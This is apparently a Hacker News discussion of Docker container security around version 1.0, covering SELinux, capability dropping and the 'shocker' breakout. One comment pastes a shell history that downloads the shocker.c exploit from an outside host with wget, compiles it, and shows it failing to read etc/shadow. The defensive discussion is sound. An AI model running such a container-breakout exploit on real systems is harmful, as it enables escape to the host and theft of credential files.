Please remember that at this time, we don't claim Docker out-of-the-box is suitable for containing untrusted programs with root privileges. So if you're thinking "pfew, good thing we upgraded to 1.0 or we were toast", you need to change your underlying configuration now. Add apparmor or selinux containment, map trust groups to separate machines, or ideally don't grant root access to the application.
Docker will soon support user namespaces, which is a great additional security layer but also not a silver bullet!
When we feel comfortable saying that Docker out-of-the-box can safely contain untrusted uid0 programs, we will say so clearly.
Docker is awesome by the way.
"..., or ideally don't grant root access to the application."
Nothing with a shared kernel is going to be very secure. That's just the nature of the beast. It's why Docker supports SELinux. It's why RHEL and CentOS ship with pre-written SELinux policy for common daemons.
If you intend to have more than zero services on the system, you want SELinux.
Is running something inside docker worse than running the same application on the host from a security pov?
If not then you can consider docker just as one way of deploying an application on the host, i.e. not something for shared hosting of independent/possibly malicious applications.
Not if you're running Windows.
Not if Windows puts money in the pocket
Xen would be cheaper and give us better utilisation but getting rid of VMware was a good step towards cost savings :)
The syntax for the transition rules on the other hand looks like someone disgorged C-struct assignments on paper and left them there. So while SELinux (the system) is quite easily understood, the rules used to build SELinux systems are frightening, large, and from first appearance, very, very complex.
(disclosure: I had the privilege of going through SELinux a few years ago when Nokia considered using it as part of their Maemo platform security. The engineering effort was eventually deemed too large and the benefit too little, so it was skipped as infeasible. Less than two years later, Google announced that they would be taking on the task with their SE-Android project.)
I trust SELinux. I don't necessarily trust my understanding of SELinux...it is a complicated beast. But, I believe that when configured correctly, it is a very powerful tool.
As I understand it, SELinux covers more ground than AppArmor. I have low familiarity with AppArmor, however, so don't know enough to argue why one might choose one over the other. But, I don't have any suspicion of SELinux containing exploitable code inserted by the NSA.
Instead of writing thousands of lines of policy from scratch, even a very complex system configuration might require a one-liner tweak to the Red Hat-provided policy.
SELinux is still operating in a shared kernel.
Its fixed in docker 1.0 since CAP_DAC_READ_SEARCH is no longer available.
Other FS-related threats to container based VMM's that have been discussed:
- subvolume related FS operations (snapshots etc)
- FS ioctl's that accept FS-handles as well (XFS)
- CAP_DAC_READ_SEARCH also defeats chroot and other
bind-mount containers (privileged LXC)
- CAP_MKNOD might be a problem too (still available in docker 1.0) depending on the drivers available in the kernel
10 wget http://stealth.openwall.net/xSports/shocker.c
11 cc -Wall -std=c99 -O2 shocker.c -static
12 apt-get install build-essential
13 cc -Wall -std=c99 -O2 shocker.c -static
14 cc -Wall -std=c99 -O2 shocker.c -static -Wno-unused-result
18 nano a.out
19 cat a.out
[***] docker VMM-container breakout Po(C) 2014
[***] The tea from the 90's kicks your sekurity again. [***]
[***] If you have pending sec consulting, I'll happily [***]
[***] forward to my friends who drink secury-tea too! [***]
[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
root@377a6f4ab0a4:/# uname -r
While the issue is currently fixed in the .12 and 1.0 versions. I doubt Docker is still completely bullet proof.
It a wonderful quote by the way, I really like it and it mirrors my reservations regarding some peoples use of visualization.
Visualization is perfectly fine, for hardware utilization, ease of deployment and so on, just don't rely on it for additional security, because that's not what it's there for.
No virtualization developer is under the impression that it's magical or bulletproof.
You rely on the operating system's security mechanisms continuously, and developers work hard to fix bugs and vulnerabilities when they appear. Same goes for virtualization -- the security semantics are just different.
Developers: No, of cause not. Some users however assume that you're automatically safe because you run Vmware/Xen/HyperV whatever.
People forget that in-chip memory protection didn't come about for security reasons, memory errors were a particularly dangerous and particularly common kind of bug and the hardware was extended to help with memory isolation. OS session ending memory errors are almost unheard of since operating systems have started fully utilizing the on-chip protection. Programmers didn't become "superhuman" at preventing these errors.
For similar reasons it's much easier for hardware-backed virtualization programmers to protect you from malicious business inside a VM than it is for OS or container programmers.
The real truth is that the difficulty of containment is proportional to the interface that is available to the contained process. You don't need VM or hypervisor technology to build a virtually unbreakable container. You only need to prevent the contained process from using any syscalls at all.
Hardware only seems better at this kind of stuff because (a) it's harder to find errata in hardware and (b) the syscall interfaces of commonly used operating systems are much larger than what the hardware offers, and were developed without keeping containability in mind. It is a well known fact that tacking on security features in hindsight is problematic.
You can't just argue away the fact that a certain class of error has been all but eliminated by hardware-supported virtual memory. Multi-tasking as we know it today would basically be impossible without it. The reliability of "just get it right" systems like the early Macintosh isn't even comparable to, for example, a modern Linux machine that uses the chip to trap large classes of erroneous memory accesses.
Given that we have the above, a case of a class of error that programmers seemed unable to eliminate (practically) eliminated, I'm not really sure what you're arguing. Are you saying that hardware designers of the 80's were superhuman?
Okay... maybe Jay Miner...
You don't need hardware to eliminate memory errors: software can do it as well. Two examples of this are the Singularity system that Microsoft Research built and Google's NaCl, where the system only loads code that can be verified not to access memory incorrectly.
Your claim that hardware is easier to analyze is also incorrect. Modern processors are extremely complex beasts and are not inherently simpler than software. All processors have long lists of errata. You may be mislead into thinking hardware is easier to secure because (a) those errata are less visible to userspace developers because the kernel shields you from them and (b) hardware developers invest much more resources into formal verification than software developers out of necessity (you can't just patch silicon). If software developers invested a similar amount of effort into formal verification tools, your impression would be rather different.
Again, the point is that there is no inherent distinction between software and hardware when it comes to securing systems. It is always and everywhere first a question of how you design your systems and interfaces and second a question of investment in development effort targeted at eliminating bugs.
Okay, now I see where you're coming from. Theoretically I agree. However, practically there are a number of things that make hardware different:
* Hardware has inherent "buy-in". The software systems you describe as also solving the memory access problem are basically opt-in frameworks. While you can make software frameworks hard to opt-out of (e.g. OS integration etc.) by definition... software runs on hardware...
* hardware solutions are often much more transparent. Again, your software example require a great deal of re-tooling. One of the most elegant aspects of the classic 80's memory access solution was how transparent it was.
* The ratio of software to hardware vendors has far fewer hardware vendors. Combine this with the fact that, as you point out, hardware is so expensive to retool and you create an environment where it is much more likely that a single hardware solution will be "correct enough" to enforce a constraint on software than it is the case that the majority of software will properly opt-in to a framework/code-correctly.
At this point I want to ask how we're defining "super-human." What level of reliability is considered to have "super-human" requirements? There are certainly very simple and clear ways that one product produced by normal humans is much more reliable than another. For example, if you admonished someone to wear their seat belt while driving, you would scoff if they replied "well then I'm just relying on seat belt designers being super-human."
It's also worth keeping in mind that modern processors are actually extremely complex and that they do regularly have errata, even though chip designers are extremely conservative in their approach by necessity (you can't just patch silicon) and are much more thorough and disciplined in their use of formal verification tools than the vast majority of software designers.
The key really is: "Don't rely on visualization for security".
"Containers" are just user-accessible support tooling to get creative with how those interfaces work. It really should be much easier to make container software than the entire virtualization infrastructure from scratch, in the same way that it's easier to write tar than a filesystem driver.
But when you considered air gap, and physical security surrounding it (12 inches of plate steal, 5 man team with guns, massive main gun), its pretty secure.
I write software that runs on tanks
Ha! Only on HN...
so it probably isn't steel in large quantities just as good as 300mm of RHA
Basically, docker used to have a "drop" list associated with each execdriver. By default docker kept all kernel bestowed capabilities but would explicitly drop those on the execdriver's drop list. This created issues with compatibility. If an image was prepared on a kernel that didn't have a particular capability at all and was suddenly run on one that was, weird hard to diagnose behavioral differences could emerge. So now docker drops everything by default and the execdrivers have a "keep" list. Also, there's now a check for the kernel defining a capability before trying to mess with it.
There are---of course---still some issues. For example, docker drops everything then tries to add the capability back. That won't work for some capabilities because some can't be added back once they've been renounced. Still, the situation is an interesting example of how a security bug is still a bug and is likely to bite you in some way sooner or later. See also XSS flaws that limit valid inputs.
Of course! If my comment could be taken as part of the mass of prose that can be read to imply otherwise, I apologize. I don't want to undermine what Docker has done with providing a packaging format, UX, and history niceness. I also don't want to undermine the years of hard work that's gone into kernel namespacing etc. that makes it all possible.
I studied SEL policies in depth back in 2000 or so, but have never once deployed a custom policy. I suspect others are the same, though common daemons on common distributions recently (~last 5 years) began to have usable pre-supplied policies, unfortunately standard services are so commodified these days they're often outsourced (email, chat, web, etc.) and so the benefits of this 'too-little-too-late' development are partly mitigated in practice.
Looks to be a few releases out past 0.11, notably 0.11.1, 0.12, and now 1.0. Can anyone confirm this works on the later versions of docker?
As an employee of Docker, I feel it is more important to me to know if we can breakout and patch those issues than to write viable exploits for them.
I have noticed that newer kernels and Docker versions (such as 1.0) are currently more difficult to break out of than they were in earlier versions. Again, however, it's highly dependent on the pairing.
What's important to recognize here is that even with breakout potential, containers should add a useful layer of security to break out of that wouldn't otherwise exist. Containers should never remove security from your system, they should only add to it. However, although deployers may find the removal of virtual machines to weaken their security story. The "secure all the things" story would be to put Qemu in a container, then run containers inside the VM.
Otherwise, security practices are as they always have been: Don't leave setuid binaries floating around, etc.
To fix this you can shutdown the container, edit the config in /var/lib/lxc/<name>/config and add dac_read_search to lxc.cap.drop. Voila.
[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
Remember to always audit the source code before running something like this. Origin repo is here:
It has been used effectively in the past! I'd encourage anyone who is researching security and Docker to send new information here.